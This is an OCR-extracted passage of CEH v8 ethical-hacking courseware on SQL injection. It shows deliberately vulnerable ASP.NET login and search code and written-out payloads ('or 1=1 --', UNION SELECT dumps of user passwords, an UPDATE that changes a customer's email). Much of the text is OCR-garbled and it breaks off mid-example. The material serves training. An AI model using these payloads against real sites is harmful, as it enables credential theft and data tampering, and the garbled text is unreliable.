Ce hv8 module 14 sql injection

S Q L In je c tio n

Module 14

Ethical Hacking and Countermeasures
SQL Injection

Exam 312-50 Certified Ethical Hacker

SQL Injection
IV/lnrlnlo 1A

E t h ic a l H a c k i n g a n d C o u n t e r m e a s u r e s V8
M o d u l e 1 4 : S Q L I n je c t io n
E x a m 3 1 2 -5 0

Module 14 Page 1987

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.

SQL Injection


Security News
Barclays: 97 Percent of Data Breaches
Still due to S Q L Injection
SQ injection attacks have been around for m than ten years,
L
ore
an security professionals are m than capable of protecting
d
ore
ag st them yet 9 percent of data breaches worldwide are still due
ain
;
7
to an SQ injection som here along the lin according to N Jones,
L
ew
e,
eira
head of paym security for Barclaycard.
ent
Speaking at the Infosecurity Europe Press Conference in London this w
eek,
Jones said that hackers are taking advantage of businesses with inadequate
an often outdated inform
d
ation security practices. C g the m recent
itin
ost
fig res fromthe N
u
ational Fraud A
uthority, she said that identity fraud co
sts
the U m than £ .7 b n every year, and affects m than 1 m n
K ore
2 illio
ore
.8 illio
people.
"Data breaches have becom a statistical certainty," saidJones. "If you look
e
at w the p b individ is concerned about, protecting personal
hat
u lic
ual
inform
ation isactually at the sam level inthe scale of p lic social concerns
e
ub
as preventing crim
e."

‫ז‬

http://news.techworld.com
Copyright © b y EG-GlOOCil. All Rights Reserved. Reproduction is Strictly Prohibited.

S e c u rity N ew s
Neuis

B a r c l a y s : 97 P e r c e n t o f D a t a B r e a c h e s S t i l l D u e t o S Q L
In je c tio n
Source: http://news.techworld.com

SQL injection attacks have been around for more than ten years, and security professionals are
more than capable of protecting against them; yet 97 percent of data breaches worldwide are
still due to an SQL injection somewhere along the line, according to Neira Jones, head of
payment security for Barclaycard.
Speaking at the Infosecurity Europe Press Conference in London this week, Jones said that
hackers are taking advantage of businesses with inadequate and often outdated information
security practices. Citing the most recent figures from the National Fraud Authority, she said
that identity fraud costs the UK more than £2.7 billion every year, and affects more than 1.8
million people.
"Data breaches have become a statistical certainty," said Jones. "If you look at what the public
individual is concerned about, protecting personal information is actually at the same level in
the scale of public social concerns as preventing crime."

Module 14 Page 1988


SQL Injection


SQL injection is a code injection technique that exploits security vulnerability in a website's
software. Arbitrary data is inserted into a string of code that is eventually executed by a
database. The result is that the attacker can execute arbitrary SQL queries or commands on the
backend database server through the web application.
In October

2011,

for example, attackers planted malicious JavaScript on Microsoft's ASP.Net

platform. This caused the visitor's browser to load an iframe with one of two remote sites.
From there, the iframe attempted to plant malware on the visitor's PC via a number of browser
drive-by exploits.
Microsoft has been offering ASP.Net programmers information on how to protect against SQL
injection attacks since at least 2005. However, the attack still managed to affect around
180,000 pages.
Jones said that, with the number of interconnected devices on the planet set to exceed the
number of humans by 2015, cybercrime and data protection need to take higher priority on the
board's agenda. In order for this to happen, however, the Chief Information Security Officer
(CISO) needs to assess the level of risk within their organisation, and take one step at a time.
"I always say, if anyone says APT [advanced persistent threat] in the room, an angel dies in
heaven, because APTs are not the problem," said Jones. "I'm not saying that they're not real,
but let's fix the basics first. Are organisations completely certain they're not vulnerable to SQL
injections? And have they coded their web application securely?"
Generally it takes between 6 and 8 months for an organisation to find out it has been breached,
Jones added. However, by understanding their risk profile and taking simple proactive
measures, such as threat scenario modelling, companies could prevent 87 percent of attacks.

Copyright © IDG 2012
By Sophie Curtis
http://news.techworld.com/securitv/3331283/barclavs-97-percent-of-data-breaches-still-due-tosal-iniection/

Module 14 Page 1989


SQL Injection


M odule Objectives
J

Network Reconnaissance Using SQL
Injection

J

SQL Injection Tools

J
J

Evasion Technique
How to Defend Against SQL Injection
Attacks

J

SQL Injection Detection

Password Grabbing

J

SQL Injection Detection Tools

SQL Injection Attacks

J

Bypass Website Logins Using SQL
Injection

J

J SQL Injection
J
J

SQL Injection Attack Characters

J Testing for SQL Injection
J Types of SQL Injection
J

Blind SQL Injection

J

CEH

SQL Injection Methodology

J Advanced SQL Injection


M o d u le O b je c tiv e s
This module introduces you the concept of SQL injection and how an attacker can
exploit this attack methodology on the Internet. At the end of this module, you will be familiar
with:
e

SQL Injection

©

Advanced SQL Injection

e

SQL Injection Attacks

s

Bypass Website Logins Using SQL Injection

e


Q

Password Grabbing

Q


Q

Network Reconnaissance Using SQL Injection

0

Testing for SQL Injection

e

SQL Injection Tools

e

Types of SQL Injection

e

Evasion Technique

e

Blind SQL Injection

e

How to Defend Against SQL Injection Attacks

e


Q

SQL Injection Detection Tools

Module 14 Page 1990


SQL Injection

I i


M o d u le F lo w
To understand SQL injection and its impact on the network or system, let us begin

with the basic concepts of SQL injection. SQL injection is a type of code injection method that
exploits the safety vulnerabilities that occur in the database layer of an application. The
vulnerabilities mostly occur due to the wrongly filtered input for string literal escape characters
embedded in SQL statements from the users or user input that is not strongly typed and then
suddenly executed without correcting the errors.

Module 14 Page 1991


SQL Injection


*

SQL Injection Concepts


^


SQL Injection Tools


) :^ ‫ן‬

^

Evasion Techniques

Blind SQL Injection

y —

Countermeasures

v‫— ׳‬


This section introduces you to SQL injection and the threats and attacks associated with it.

Module 14 Page 1992


SQL Injection


SQL Injection
cs

Q SQL Injection is the

9 It is a fla w in W e b

©

Q M o st program m ers are

most com m on w e b site

A p p licatio n s and not a

still not a w a re of this

v u ln e ra b ility on the

database or w eb

threat

Internet

se rver issue

©
Copyright © b y EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

1

SQ
L

SQL In je c tio n
SQL injection is a type of web application vulnerability where an attacker can

manipulate and submit a SQL command to retrieve the database information. This type of
attack mostly occurs when a web application executes by using the user-provided data without
validating or encoding it. It can give access to sensitive information such as social security
numbers, credit card numbers, or other financial data to the attacker and allows an attacker to
create, read, update, alter, or delete data stored in the backend database. It is a flaw in web
applications and not a database or web server issue. Most programmers are still not aware of
this threat.

Module 14 Page 1993


SQL Injection


Scenario
v o la tility s u b d u e d

_ —

« ■rt‫. רד 3 ־‬Q u 1j .
v

Albert Gonzalez, an indicted hacker stole 130 million credit
and debit cards, the biggest identity theft case ever prosecuted
in the United States. He used SQL injection attacks to install
sniffer software on the companies' servers to intercept credit
card data as it was being processed.
http ://www. theregister.co. uk

pro**—
1 B u s i n e s s
^

w o r l d

—•■nomic upturn

0

p 1

1

.
m

l s t i c

lid a s s e t s

Copyright © b y EC-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

a

S c e n a rio
Albert Gonzalez, an indicted hacker stole 130 million credit and debit cards,

performed the biggest identity theft case ever prosecuted in the United States. He used SQL
injection attacks to install sniffer software on companies' servers to intercept credit card data
as it was being processed.

Module 14 Page 1994


SQL Injection


SQL Injection Is the M ost
Prevalent Vulnerability in 2012

CEH

SQL Injection
Unknown
DD0S

D efacem ent
Targeted Attack
DNS Hijack
Password Cracking
Account Hijacking

Java Vulnerability

Other

http://hackmageddon.com
Copyright © b y

EG-G*ancil. All

Rights Reserved. Reproduction Is Strictly Prohibited.

Source: http://hackmageddon.com
According to http://hackmageddon.com. SQL injection is the most commonly used attack by
the attacker to break the security of a web application.
From the following statistics that were recorded in September 2012, it is clear that, SQL
injection is the most serious and mostly used type of cyber-attack performed these days when
compared to other attacks.

Module 14 Page 1995


SQL Injection


SQL Injection
Unknown
DDoS
Defacement
Targeted Attack
DNS Hijack
Password C
racking
Account Hijacking
Java Vulnerability
Other

FIGURE 14.1: SQL Injection

Module 14 Page 1996


SQL Injection


SQL Injection Threats

CEH

U rtifM

IthKJl lUckM

O Spoofing Identity

C
hanging Price
Tam w
per ith
D
atabase Records^ '/ •.
‫- ־׳‬

M
odifying Records :
Escalation of
Privileges

Voiding Machine's
^Critical Transactions

D
enial‫־‬of‫־‬Service
on the Server

Complete Disclosure of
all Data on the System .

D
estruction
of D
ata

Copyright © by EG-GtUIICil. All Rights R eserved. Reproduction is Strictly Prohibited

y

SQL In je c tio n T h re a ts
The following are the major threats of SQL injection:

9

Spoofing identity: Identity spoofing is a method followed by attackers. Here people are
deceived into believing that a particular email or website has originated from the source
which actually is not true.

© Changing prices: One more of problem related to SQL injection is it can be used to
modify data. Here the attackers enter into an online shopping portal and change the
prices of product and then purchase the products at cheaper rates.
Q

Tamper with database records: The main data is completely damaged with data
alteration; there is even the possibility of completely replacing the data or even deleting
the data.

Q

Escalation of privileges: Once the system is hacked, the attacker seeks the high
privileges used by administrative members and gains complete access to the system as
well as the network.

9

Denial-of-service on the server: Denial-of-service on the server is an attack where users
aren't able to access the system. More and more requests are sent to the server, which
can't handle them. This results in a temporary halt in the services of the server.

Module 14 Page 1997


SQL Injection

0


Complete disclosure of all the data on the system: Once the network is hacked the
crucial and highly confidential data like credit card numbers, employee details, financial
records, etc. are disclosed.

0

Destruction of data: The attacker, after gaining complete control over the system,
completely destroys the data, resulting in huge losses for the company.

© Voiding system's critical transaction: An attacker can operate the system and can halt
all the crucial transactions performed by the system.
0

Modifying the records: Attackers can modify the records of the company, which proves
to be a major setback for the company's database management system.

Module 14 Page 1998


SQL Injection


-

What Is SQL Injection?

CEH

SQL injection is a technique used to take advantage of non-validated
input vulnerabilities to pass SQL commands through a web application
for execution by a backend database
SQL injection is a basic attack used to either gain unauthorized access to
a database or to retrieve information directly from the database


SOL

W h a t Is SQL In je c tio n ?
Structured Query Language (SQL) is basically a textual language that enables
interaction with a database server. SQL commands such as INSERT, RETRIEVE, UPDATE, and
DELETE are used to perform operations on the database. Programmers use these commands to
manipulate data in the database server.
SQL injection is defined as a technique that takes advantage of non-validated

input

vulnerabilities and injects SQL commands through a web application that are executed in a
back-end

database.

Programmers

use

sequential

SQL

commands

with

client-supplied

parameters making it easier for attackers to inject commands. Attackers can easily execute
random SQL queries on the database server through a web application. Attackers use this
technique to either gain unauthorized access to a database or to retrieve information directly
from the database.

Module 14 Page 1999


SQL Injection


J On the basis of application used and the way it processes user supplied data, SQL injection
can be used to implement the attacks mentioned below:
A u th e n tic a tio n B y p a s s

U gth attack, an attacker lo sonto anap lication
sin is
g
p
w
ithout p vid gvalid u nam an p o
ro in
ser
e d assw rd
an g s ad inistrative p
d ain m
rivileg
es
R e m o te C o d e E x e c u t io n

In fo r m a t io n D is c lo s u r e

It assistsan attacker to
com
prom the host O
ise
S

U gth attack, anattacker
sin is
o tain sen
b s sitive inform
ation that
issto inthe d ase
red
atab

C o m p r o m is e d

C o m p r o m is e d D a ta In t e g r it y

A v a ila b ilit y o f D a ta

A attacker u th attackto d
n
ses is
eface a
w p e in m
eb ag , sert aliciouscontent in
to
w p es, or alter the contents of a
eb ag
d ase
atab

A
ttackers u th attacktodelete
se is
the d
atabase in ation delete
form ,
lo , or au it in ation that is
g
d form
sto ina d ase
red
atab

/Copyright © b y EG-CMMCil. All Rights JteSeivecL R ep ro d u ctio n is Strictly Prohibited.

SQL In je c tio n A tta c k s
Based on the application and how it processes user-supplied data, SQL injection can be
used to perform the following types of attacks:
a

Authentication bypass: Here the attacker could enter into the

network without

providing any authentic user name or password and could gain the access over the
network. He or she gets the highest privilege in the network.
Q Information disclosure: After unauthorized entry into the network,

the attacker gets

access to the sensitive data stored in the database.
Q

Compromised data integrity: The attacker changes the main content of the website and
also enters malicious content into it.

Compromised availability of data: The attacker uses this type of attack to delete the
data related to audit information or any other crucial database information.

Remote code execution: An attacker could modify, delete, or create data or even can
create new accounts with full user rights on the servers that share files and folders. It
allows an attacker to compromise the host operating system.

Module 14 Page 2000


SQL Injection


How Web Applications Work

CEH

h ttp://juggyboy.com /?id= 6329& print= Y

Internet

W e b S erver

Firew all

OS System Calls

Operating System

ID

Tech

W e b A pplication

Topic

6329

DBM S

SELECT * from news where id = 6329

CNN
O utput

Copyright © b y

EC-ClUIICil. All

Rights Reserved. Reproduction is Strictly Prohibited.

H ow W eb A p p lic a tio n s W ork
A web application is a software program accessed by users over a network through a
web browser. W eb applications can be accessed only through a web browser (Internet
Explorer, Mozilla Firefox, etc.). Users can access the application from any computer of a
network. Based on web applications, web browsers also differ to some extent. Overall
response time and speed is dependent on connection speed.

Step 1: The user requests through the web browser from the Internet to the web server.
Step 2: The W eb Server accepts the request and forwards the request sent by the user to the
applicable web application server.

Step 3: The web application server performs the requested task.
Step 4: The web applications accesses the entire database available and responds to the web
server.

Step 5: The web server responds back to the user as the transaction is complete.
Step 6: Finally the information that the user requested appears on the monitor of the user.

Module 14 Page 2001


SQL Injection


ID

Topic

New s

6329

Tech

CNN

SELECT * from news where id = 6329

FIGURE 14.2: Working of Web Applications

Module 14 Page 2002


SQL Injection


Server-side Technologies

CEH

Powerful server-side technologies like ASP.NET and
database servers allow developers to create dynam
ic,
data-driven websites with incredible ease

The power of ASP.NETand SQL can easily be exploited
by hackers using SQL injection attacks

SQL

Server

A relational databases,SQLServer, Oracle, IBM D
ll
B2,
and MySQL, are susceptible to SQL-injection attacks

SQ injection attacks do not exploit a specific softw
L
are
vulnerability, instead they target websites that do not
follow secure coding practices for accessing and
m
anipulating data stored in a relational database

S e rv e r-sid e T e c h n o lo g ie s
This technology is used on the server side for client/server technology. For achieving
business success, not only information is important, but we also need speed and efficiency.
Server-side technology helps us to smoothly access, deliver, store, and restore information.
Various server-side technologies include: ASP, ASP.Net, Cold Fusion, JSP, PHP, Python, and Ruby
on Rails. Server side technologies like ASP.NET and SQL can be easily exploited by using SQL
injections.
Q

Powerful server-side technologies like ASP.NET and database servers allow developers
to create dynamic, data-driven websites with incredible ease.

Q

All relational databases, SQL Server, Oracle, IBM DB2, and MySQL, are susceptible to
SQL injection attacks.

e

SQL injection attacks do not exploit a specific software vulnerability; instead they target
websites that do not follow secure coding practices for accessing and manipulating data
stored in a relational database.
The power of ASP.NET and SQL can easily be exploited by attackers using SQL injection
attacks.

Module 14 Page 2003


SQL Injection


CEH

HTTP Post R equest
h ttp :// ju ggyb oy.com /lo gon .aspx ?usern am e= bart& p assw ord= sim p so n

Account Login
Usern am e
Password

J

^ b art

simp!

W h e n a user provides inform ation and clicks
Subm it, th e brow ser subm its a string to th e w eb
server th at contains the user's credentials
This string is visible in th e body of the HTTP or
HTTPS POST request as:

SQL query at the database
select * from Users where
(username = 1 a r t 1 and
b
password = •simpson1);

<form action-"/cgi-bin/login”
me thod-pos t>
Username: <input type-text
name-username>
Password: <input
type=password name=password>
<input type=submit
value=Login>
■a••■........... .............. ................ .......................... ..

Copyright © b y

EG-G*ancil. All


H TTP P ost R eq u est
An HTTP POST request creates a way of passing larger sets of data to the server. The
HTTP POST requests are ideal for communicating with an XM L web service. These methods are
designed for data submission and retrieval on a web server.
W hen a user provides information and clicks Submit, the browser submits a string to the web
server that contains the user's credentials. This string is visible in the body of the HTTP or
HTTPS POST request as:
SQL query at the database
s e le c t * from U sers where (username = ,b a r t '

and password = 's im p s o n ');

<form a c tio n = "/ c g i- b in / lo g in " method=post>
Username: < input typ e= text name=username>
Password: <input type=password name=password>
C in p ut type=submit value=Login>

Module 14 Page 2004

Ethical Hacking and Countermeasures Copyright © by EC-COUIICil

SQL Injection


Example 1: Normal SQL Query
I Q Q

http://juggyboy.com/BadLogin.aspx

B a d L o g in . a s p x . c s
p r iv a t e

v o id

c m d L o g in

S y s te m . E v e n tA r g s
{

9

jy B o y .c o m

s trin g

s trC n x

C lic k (o b je c t

se n d e r,

e )
=

" se rve r=
l o c a l h o s t ; d a t a b a s e = n o r t h w i n d /u i d = s a ; p w d = ; " ;
S q lC o n n e c tio n

cnx

= new

S q lC o n n e c t io n (s tr C n x )

c n x .O p e n ( ) ;

/ / T h is

code

is

s u s c e p t ib le

to

SQ L

in je c t io n

a tta c k s .

string strQry = "SELECT Count(*) FROM
Users W HERE U s e r N a m e ‫ + "' ־‬t x t U ser.Text +
" ‫ י‬AND Password ‫ + "י ־‬txtPasswo r d . T e x t +

in t

in tR e c s ;

S q lC o m m a n d
in t R e c s

Web Browser

i f

■

cm d

■ new

(in t)

(in t R e c s > 0 )

S q lC o m m a n d (s tr Q r y ,

cnx) ;

cm d.E x e c u t e S c a la r ( ) ;
{

F o r m s A u t h e n t ic a t io n .R e d ir e c tF r o m L o g in P a g e (tx tU s e r
.T e x t,

f a ls e );

lb lM s g .T e x t

C onstructed SQ L Q u e ry

<■

}

e ls e

— ‫ ״‬L o g in

{
a tte m p t

fa ile d .‫; ״‬

)

c n x .C lo s e ( ) ;

>

SELECT Count(*) FROM Users WHERE
UserName=‫״‬Jason1 AND Password ‫י ־‬Springfield

1

Server-side Code (BadLogin.aspx)

/Copyright © b y EC - C M IC il. All Rights JteServ ed lR ep ro d u ctio n Is Strictly Prohibited.

E x a m p l e 1: N o r m a l S Q L Q u e r y
Here the term "query" is used for the commands. All the SQL code is written in the
form of a query statement and finally executed. Various data operations of the SQL queries
include selection of the data, inserting/updating of the data, or creating data objects like
databases and tables with SQL. All the query statements begin with a clause such as SELECT,
UPDATE, CREATE, and DELETE.
SQL Query Examples:

Module 14 Page 2005


SQL Injection


■‫ף‬

hup://]uggyboy ( 0ii1/B«kI login wvpx

B

J u g g y B o y .c o m

b o d L o g rn . a c p x . ce
p r i v a t e v o i d c m d L o g 1 n _ C 1 1 c k (o b je c t s e n d e r ,
S y s te n .E v e n tA r g s e)
< s t r i n g s trC n x =
• s e r v o r=
‫׳‬
lo c A l h o s t ; d a t a b a a o ‫ ־‬n o r t h H 1 n d ;u i d - s a ?p w d - ; " ;
S q l C o n n e c t io n c n x = new S q l C o n n e c t i o n ( s t r C n x ) ;
c n x . Open ( ) ;
/ / T h is cod e i s
a tta c k s .
s trin g
U se rs
" ‫י‬

W eb Brow ser

Constructed SQL Query
SELEC T

C o u n t(• )

U s e r N a 1*e = ' • T a s o n '

FRO M U s e r s
AN D

W HERE

W HERE

AND

s u s c a p t ib le

s trQ ry

=

to

‫ ״‬SELEC T

U se rN a m e = ' ‫״‬

P a s s w o r d * '"

+

SQ L i n j e c t i o n
C o u n t ( * ‫)׳‬
+

FRO M

tx tU s e r.T e x t

tx tP a s s w o rd . T e x t

+
+

i n t m tR e c s ;
S q lC o aaa an d e n d = new SqlCom m and ( s t r Q r y , c n x ) :
m t R e c s = ( i n t ) crad . E x e c u t e S c a l a r () ;
i f (in t R e c s > 0 ) {
F o r m s A u t h e n t ic a t io n . R e d ir e c t F r o m L o g in P a g e ( t x t U s e r
.T e x t, f a l s e ) ; ) e l s e {
lf c lM s g . T e x t = " L o g i n a t t e m p t f a i l e d . " ; }
c n x .C lo s e () ;

)

P a s s w o rd ‫ ' ־‬S p r in g f ie ld *

Server Side Code (BadLogin.aspx)

FIGURE 14.3: SQL Query Exam
ple

Module 14 Page 2006


SQL Injection


CEH

Example 1: SQL Injection Query
I Q Q

http://juggyboy.com/BadLogin.aspx

9

jy B o y .c o m

Attacker Launching SQL Injection

SELECT Count(*) FR M Users W ERE UserNam Blah' or 1 1 --1 A D Password='Springfield1
O
H
e=1
=
N
SELECT Count(*) FR M Users W ERE UserNam Blah' or 1 1
O
H
e=‫י‬
=

—' A D Password='Springfield1
N

SQL Query Executed

Code after — are now com ents
m
Copyright © b y EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

‫ ן‬E x a m p l e 1: S Q L I n j e c t i o n Q u e r y
The most common operation in SQL is the query, and it is performed with the
declarative SELECT statement. This SELECT command retrieves the data from one or more
tables. SQL queries allows a user to describe or assign the desired data, and leave the DBMS
(Data Base Management System) as responsible for optimizing, planning, and performing the
physical operations. A SQL query includes a list of columns to be included in the final result of
the SELECT keyword.
If the information submitted by a browser to a web application is inserted into a database
query without being properly checked, then there may be a chance of occurrence of SQL
injection. HTML form that receives and passes the information posted by the user to the Active
Server Pages (ASP) script running on IIS web server is the best example of SQL injection. The
information passed is the user name and password. By querying a SQL server database these
two data items are checked.
username B la h ' o r 1=1 —
password S p r in g f ie ld
The query executed is:
SELECT C o u n t(*)
FROM U sers
Password‫ ' ־‬S p r i n g f i e l d 1;

Module 14 Page 2007

WHERE

UserName=' B la h '

or

1=1

--

AND


SQL Injection


However, the ASP script builds the query from user data using the following line:
B la h query = 1SELECT * FROM u sers WHERE username = 1" + B la h 1 or 1=1 —
1
+‫ ' ״‬AND password =
+ S p r in g f ie ld +
If the user name is a single-quote character (') the effective query becomes:
SELECT
*
FROM
' [S p r in g fie ld ]';

s e rs

WHERE

username

=

111

AND

password

=

This is invalid SQL syntax and produces a SQL server error message in the user's browser:
M ic r o s o ft OLE DB P r o v id e r f o r ODBC D r iv e r s e r r o r

'80040el4'

[M icro so ft][O D B C SQL S e r v e r D r iv e r ][S Q L S e rv e r]U n c lo s e d q u o ta tio n mark
b e fo re the c h a r a c te r s t r in g

‫ ' י‬and p assw ord = ''.

/ lo g in .a s p , l i n e 16
The quotation mark provided by the user has closed the first one, and the second generates an
error, because it is unclosed. At this instance, to customize the behavior of a query, an attacker
can begin injecting strings into it. The content proceeding the double hyphes (--) signify a
Transact-SQL comment.
0®£

13©

nttp://|usfivt>0Y com/Badiofiin.aspx

^

B o y .c o m

p a ■ 1=1•- !
Blah‫ ־‬or
[

SELECT Count(*)

Springfield

< ..................................

A ttacker Launching SQ L Injectio n

FROM Users WHERE UserName” ‫י‬B l a h ' or 1"1 --' AND Password‫' ״‬Springfield'

SQ L Q u e ry Executed

Code after —

are com ments

FIGURE 14.4: SQL Injection Query Exam
ple

Module 14 Page 2008


SQL Injection


CEH

Exam ple 1: Code Analysis
When the attacker enters blah' or
1 1 - then the SQL query w
= ill
look like:
SELECT Count(*) FRO
M
Users W
HERE
UserName='blah ‫ י‬Or 1 1 —
=
‫ י‬A D Password=''
N
Because a pair of hyphens
designate the beginning of a
com ent in SQ the query sim
m
L,
ply
becom
es:
SELECT Count(*) FRO
M
Users W
HERE
UserName='blah' Or 1 1
=

A user enters a user name and
password that matches a
record in the user's table
J A dynamically generated SQL
query is used to retrieve the
number of matching rows
J The user is then authenticated
and redirected to the
requested page

string strQry = "SELECT Count(*)
FROM Users WHERE U s e r N a m e ‫+ "' ־‬
txtUser.Text +
AND Password‫" ־‬
+ t x t P a s s w o r d .Text + . ;
.


E x a m p l e 1: C o d e A n a l y s i s
Code analysis is the process of automated testing of the source code for the purpose
of debugging before the final release of the software for the purpose of sale or distribution.
a

A user enters a user name and password that matches a record in the Users table

©

A dynamically generated SQL query is used to retrieve the number of matching rows

© The user is then authenticated and redirected to the requested page
W hen the attacker enters blah' or 1=1 - then the SQL query can look like:
SELECT Count
Password‫' ' ־‬

(*)

FROM

U sers

WHERE

UserName=' b l a h '

Or

1=1

— '

AND

Because a pair of hyphens designates the beginning of a comment in SQL, the query simply
becomes:
SELECT Count (*)

FROM U sers WHERE UserName=' b la h ' Or 1=1

s t r in g
s trQ ry = "SELECT C o u n t(*)
FROM U sers WHERE
tx tU s e r .T e x t + 1 ' AND Passw ord= '" + tx tP a s s w o rd . Text +
1

Module 14 Page 2009

UserName='"

+


SQL Injection


Example 2: BadProductList.aspx

CEH

This page displays products

GO
p r iv a te

from the Northwind
database and allows users

http://juggyboy.com/BadProductList.aspx

to filter the resulting list of
v o id

c m d F ilt e r _ C lic }c (o b je c t

d g r P r o d u c t s . C u r re n tP a g e ln d e x
b in d D a ta G r id ( ) ; }

sen d e r.

S y s te m .E v e n tA r g s

e)

products using a textbox
called txtFilter

{

= 0;

p r i v a t e v o id b in d D a t a G r id () {
d g rP ro d u c ts .D a ta S o u rc e = c r e a t e D a t a V ie w ();
d g r P r o d u c ts .D a ta B in d ( ) ;
p r iv a te

D a t a V ie w

)

c re a te D a ta V ie w ()

Lik the previous
e
exam (BadLogin.aspx),
ple
this code isvulnerable to
SQ injection attacks
L

{

s t r in g s trC n x =
" s e r v e r ‫ ־‬l o c a l h o s t ; u id = s a ;p w d = ; d a ta b a s e ‫ ־‬n o r t h w in d ; " ;
s trin g

s trS Q L -

"S E L E C T

"Q u a n tity P e r U n it ,
/ / T h is
i f

code

is

P r o d u c t ld ,

U n it P r ic e

s u s c e p t ib le

to

( t x t F i l t e r .T e x t . L e n g th
8 trS Q L

S q lC o n n e c t io n

+‫״‬

‫״‬

cnx

W H ERE

P ro d u c tN a m e ,

"

SQ L i n j e c t i o n
> 0)

a tta c k s .

{

P ro d u c tN a m e

L IK E

‫״י‬

+

t x t F i l t e r .T e x t

• <
‫;״‬

« new S q l C o n n e c t i o n ( s t r C n x ) ;
‫־־‬

S q l D a t a A d a p t e r s d a = new S q l D a t a A d a p t e r ( s t r S Q L ,
D a t a T a b le d t P r o d u c t s = new D a t a T a b l e ( ) ;
sd a.F ill(d t P r o d u c t s );
re tu rn

♦

FROM P r o d u c t s " ;

The executed SQ is
L
constructed dynam
ically
froma u
ser-su p
p lied
in u
pt

c n x );

Attack Occurs Here

d tP r o d u c ts .D e fa u ltV ie w ;

Copyright © b y

EG-Giancil. All


E x a m p l e 2: B a d P r o d u c t L i s t . a s p x
Source: http://msdn.microsoft.com
This page displays products from the Northwind database and allows users to filter the
resulting list of products using a textbox called txtFilter. Like the last example, the page is ripe
for SQL injection attacks because the executed SQL is constructed dynamically from a userentered value. This particular page is a hacker's paradise because it can be hijacked by the
astute hacker to reveal secret information, change data in the database, damage the database
records, and even create new database user accounts.
Most SQL-compliant databases including SQL Server, store metadata in a series of system tables
with the names sysobjects, syscolumns, sysindexes, and so. This means that a hacker could use
the system tables to ascertain schema information for a database to assist in the further
compromise of the database. For example, the following text entered into the txtFilter textbox
might be used to reveal the names of the user tables in the database:
UNION SELECT id , name,

0 FROM s y s o b je c ts WHERE xtype = 'U ' --

The UNION statement in particular is useful to a hacker because it allows him or her to splice
the results of one query onto another. In this case, the hacker has spliced the names of the user
tables in the database to the original query of the Products table. The only trick is to match the
number and data types of the columns to the original query. The previous query might reveal

Module 14 Page 2010


SQL Injection


that a table named Users exists in the database. A second query could reveal the columns in the
Users table. Using this information, the hacker might enter the following into the txtFilter
textbox:
UNION SELECT 0, UserName, Password, 0 FROM U sers -Entering this query reveals the user names and passwords found in the Users table.

p r i v a t e v o id c m d r i lt e r _ c l ic k ( 0b j e c t s e n d e r, S y ste a .E v e n tA rg s e)
d g rP ro d u c ts . C u rren tP ag eIn d ex = 0;
b in d O a t a O r id () ; )

{

p r iv a t e v o id b in d O a ta O rid () (
d g rP ro d u c ts . D ataSource = c r e a te D a ta V ie w ();
d g rP ro d u c ts . D a ta B in d ( ) ; )
p r i v a t e D ataV iew c re a te D a ta V ie w ()
(
s t r in g strC n x =
" s e r v e r =lo c a lh o s t ;u id = s a , pwd= datab a se=n o rth w ln d ‫'־‬
‫־‬
s t r in g strSQL = "SELECT ProductXd, ProductN ane, ■ H
" Q u a n tlty P e r U n lt, U n itP r ic e FROM P r o d u c t s ':

FIGURE 14.5: BadProductList.aspx

Module 14 Page 2011


SQL Injection


Exam ple 2: Attack A nalysis

CEH

Urt«fW<

ItlMui HMkM

SELECT Productld, ProductName, QuantityPerUnit, UnitPrice FRO Products W
M
HERE
ProductName LIKE 'blah' UNION Select 0, username, password, 0 from users —
Copyright © b y

EG-C0uacil. All

Rights R eserved. Reproduction is Strictly Prohibited.

E x a m p l e 2: A t t a c k A n a l y s i s
Any website has a search bar for the users to search for data and if the search bar
can't find the vulnerabilities in the data entered, then it can be used by attackers to create
vulnerabilities to attack.
W hen you enter the value into the search box as: blah UNION Select 0, username, password, 0
from users.
SQL Query Executed:
SELECT ProductID,
ProductName

LIKE

ProductName, QuantityPerUnit, UnitPrice
'blah' UNION SELECT

0,

FROM Products

username, password,

0 FROM

USERS

WHERE
--

After executing the SQL query it shows results with the user names and passwords.

Module 14 Page 2012




SQL Injection

O

O

http://|uggyboyshop com

Ju g g y B o y S h o p .c o m

Search for Products

c

‫נ‬

>

Attacker Launching
SQL Injection

J

blah' UNION Select 0, username,
password 0 from users —
Usernam es and Passwords are displayed

FIGURE 14.6: Attack Analysis

Module 14 Page 2013


SQL Injection


Example 3: Updating Table

E x a m p l e 3: U p d a t i n g T a b l e
To create the UPDATE command in the SQL query the syntax is:
UPDATE " table_nam e"
SET "co lu m n _l" = [new v a lu e ]
WHERE {c o n d itio n }
For example, say we currently have a table as follows:
Table Store Information
Store_Nam e

Sales

Date

Sydney

$100

Aug-06-2012

Melbourne

$200

Aug-07-2012

Queensland

$400

AUg-08-2012

Victoria

$800

Aug-09-2012

TABLE 14.1: Store Table
And we notice that the sales for Sydney on 08/06/2012 are actually $250 instead of $100, and
that particular entry needs to be updated. To do so, we use the following SQL query:

Module 14 Page 2014


SQL Injection


UPDATE Store Information
SET S a le s = 250
WHERE s to re name = "Sydney"
AND Date = "08/06/2012"
The resulting table would look like this:
Table Store Information
Store_Nam e

Sales

Date

Sydney

$250

Aug-06-2012

Melbourne

$200

Aug-07-2012

Queensland

$400

AUg-08-2012

Victoria

$800

Aug-09-2012

TABLE 14.2: Store Table After Updating

Ju g g y B o y .c o m
Forgot Password


blah'; UPDATE jb-customers SET jb-email
- 'info8juggyboy.com' WHERE email
='jason5springfield.com; --

E m a il A d d r e s s

Your passw ord will be sent to your
registered email address

Ml
SQL Injection Vulnerable W ebsite

SQL Query Executed
SEI.F.CT j b - e m a 1 l , j b - p a s s w d , j b - 1 o g i n _ i r i , j b - l a s t _ n a m e F R O M m e m b e r s
WHERE ‫־‬
jb-email - ,blah'; UPDATE jb-customers SET jb-email - 'info@juggyboy.com'
w h e r e email = ’jasonpspringfield.com; — ■;

FIGURE 14.7: SQL Injection Attack

Module 14 Page 2015


SQL Injection


Example 4: Adding New Records

CEH

u
J
f

1 1

g g y B o y . c o m

t
Fo rg o t P a s s w o rd

b la h ’ ;

IN S E R T

IN T O

jb - c u s t o m e r s

Em ail Address

p a s s w d ' , 1j b ‫ ־‬l o g i n _ i d ' , ' j b ‫־־‬l a s t _ n a m e ' )
( ' ja s o n @ s p r in g f ie ld . com ' , ' h e l l o ',

registered em ail address

